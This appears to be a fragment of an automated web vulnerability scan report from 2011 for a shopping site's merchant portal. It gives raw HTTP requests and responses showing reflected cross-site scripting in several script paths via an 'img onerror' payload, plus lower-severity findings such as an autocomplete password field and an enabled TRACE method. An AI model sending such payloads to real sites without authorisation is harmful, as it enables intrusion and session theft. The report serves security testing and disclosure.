HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:25 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 211 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/utils/tracking |
GET /scripts/utilsec556<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:41 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 211 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/utils/tracking |
GET /scripts/utils/8a47f<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:57:11 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9551 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: scripts.utils.8a47f<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/utils/ui.js |
GET /scripts47080<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:26 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 198 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/utils/ui.js |
GET /scripts/utils20237<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:56:42 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 198 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript; charset=utf-8 {"flsid":"6997ae4312 |
Severity: | High |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/utils/ui.js |
GET /scripts/utils/928cc<img%20src%3da Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:57:12 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9551 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div id="tf_container"> [Could not find component: scripts.utils.928cc<img src=a onerror=alert(1) </div> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | / |
GET / HTTP/1.1 Host: merchant.thefind.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:15:33 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Set-Cookie: flsid=d71c305476fd00 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Set-Cookie: fl-uid=b348bae925b8f Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 15532 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... <div style="padding:0px 10px;"> <form id="mc_login_frm" action="/mc/McUser?user <div class="main-header"> ...[SNIP]... <div><input type="password" name="login_password" id="login_password" size="30" value="" style="width:100%; padding:5px 0px 4px 0px;" /></div> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | / |
GET / HTTP/1.1 Host: merchant.thefind.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:15:33 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Set-Cookie: flsid=d71c305476fd00 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Set-Cookie: fl-uid=b348bae925b8f Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 15532 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /mc/MerchantProgram.fhtml |
GET /mc/MerchantProgram.fhtml HTTP/1.1 Host: merchant.thefind.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:15:36 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Set-Cookie: flsid=6d5feee1d5d14f Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Set-Cookie: fl-uid=0e628829e04d6 Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 15827 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | / |
GET / HTTP/1.1 Host: merchant.thefind.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:15:33 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Set-Cookie: flsid=d71c305476fd00 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Set-Cookie: fl-uid=b348bae925b8f Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 15532 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /mc/MerchantProgram.fhtml |
GET /mc/MerchantProgram.fhtml HTTP/1.1 Host: merchant.thefind.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:15:36 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Set-Cookie: flsid=6d5feee1d5d14f Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Set-Cookie: fl-uid=0e628829e04d6 Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 15827 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | / |
GET /?utm_source=theFind Host: merchant.thefind.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:15:34 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Set-Cookie: flsid=f489b4856fd886 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Set-Cookie: fl-uid=5271ff5607cc5 Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 15532 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... </script><script type="text/javascript" src="//ajax.googleapis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /mc/MerchantProgram.fhtml |
GET /mc/MerchantProgram.fhtml Host: merchant.thefind.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:15:38 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Set-Cookie: flsid=b36581b061a436 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Set-Cookie: fl-uid=33b6896a1d536 Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 15827 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... </script><script type="text/javascript" src="//ajax.googleapis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | / |
GET / HTTP/1.1 Host: merchant.thefind.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:15:33 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Set-Cookie: flsid=d71c305476fd00 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Set-Cookie: fl-uid=b348bae925b8f Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 15532 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... </script><script type="text/javascript" src="//ajax.googleapis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /mc/MerchantProgram.fhtml |
GET /mc/MerchantProgram.fhtml HTTP/1.1 Host: merchant.thefind.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:15:36 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Set-Cookie: flsid=6d5feee1d5d14f Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Set-Cookie: fl-uid=0e628829e04d6 Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 15827 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... </script><script type="text/javascript" src="//ajax.googleapis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /mc/a |
GET /mc/a HTTP/1.1 Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:18:27 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Content-Language: en Vary: User-Agent,Accept Status: 200 OK X-Content-Encoded-By: class.Conteg.0.13 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 Content-Length: 9497 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... </script><script type="text/javascript" src="//ajax.googleapis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | / |
GET / HTTP/1.1 Host: merchant.thefind.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:15:33 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Set-Cookie: flsid=d71c305476fd00 Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Set-Cookie: fl-uid=b348bae925b8f Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 15532 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /mc/MerchantProgram.fhtml |
GET /mc/MerchantProgram.fhtml HTTP/1.1 Host: merchant.thefind.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:15:36 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Set-Cookie: flsid=6d5feee1d5d14f Expires: Tue, 23 Feb 1999 18:30:00 GMT Cache-Control: must-revalidate, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT Set-Cookie: fl-uid=0e628829e04d6 Content-Language: en Vary: Accept-Encoding Status: 200 OK Content-Length: 15827 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | / |
TRACE / HTTP/1.0 Host: merchant.thefind.com Cookie: d3da3b73e8a62fa5 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:15:34 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 Connection: close Content-Type: message/http TRACE / HTTP/1.0 Host: merchant.thefind.com Cookie: d3da3b73e8a62fa5 |
Severity: | Information |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | /scripts/mc/prototype.js |
GET /scripts/mc/prototype.js HTTP/1.1 Host: merchant.thefind.com Connection: keep-alive Referer: https://merchant.thefind Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-486391256 |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:17:46 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 Last-Modified: Thu, 03 Mar 2011 04:45:29 GMT ETag: "3d89e-d76d-b2e24c40" Accept-Ranges: bytes Content-Length: 55149 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/x-javascript /* Prototype JavaScript framework, version 1.5.0_rc0 * (c) 2005 Sam Stephenson <sam@conio.net> * * Prototype is freely distributable under the terms of an MIT-style license. * For details, see ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | / |
GET /robots.txt HTTP/1.0 Host: merchant.thefind.com |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 11:15:35 GMT Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 Last-Modified: Wed, 06 Feb 2008 19:21:42 GMT ETag: "8036-1a-445f3d80" Accept-Ranges: bytes Content-Length: 26 Connection: close Content-Type: text/plain; charset=UTF-8 User-agent: * Disallow: / |
Severity: | Information |
Confidence: | Certain |
Host: | https://merchant.thefind |
Path: | / |
Issued to: | *.thefind.com |
Issued by: | Go Daddy Secure Certification Authority |
Valid from: | Tue Jul 14 12:38:42 CDT 2009 |
Valid to: | Tue Jul 24 01:54:36 CDT 2012 |
Issued to: | Go Daddy Secure Certification Authority |
Issued by: | Go Daddy Class 2 Certification Authority |
Valid from: | Wed Nov 15 19:54:37 CST 2006 |
Valid to: | Sun Nov 15 19:54:37 CST 2026 |
Issued to: | Go Daddy Class 2 Certification Authority |
Issued by: | http://www.valicert.com/ |
Valid from: | Tue Jun 29 12:06:20 CDT 2004 |
Valid to: | Sat Jun 29 12:06:20 CDT 2024 |
Issued to: | http://www.valicert.com/ |
Issued by: | http://www.valicert.com/ |
Valid from: | Fri Jun 25 19:19:54 CDT 1999 |
Valid to: | Tue Jun 25 19:19:54 CDT 2019 |
Issued to: | http://www.valicert.com/ |
Issued by: | http://www.valicert.com/ |
Valid from: | Fri Jun 25 19:19:54 CDT 1999 |
Valid to: | Tue Jun 25 19:19:54 CDT 2019 |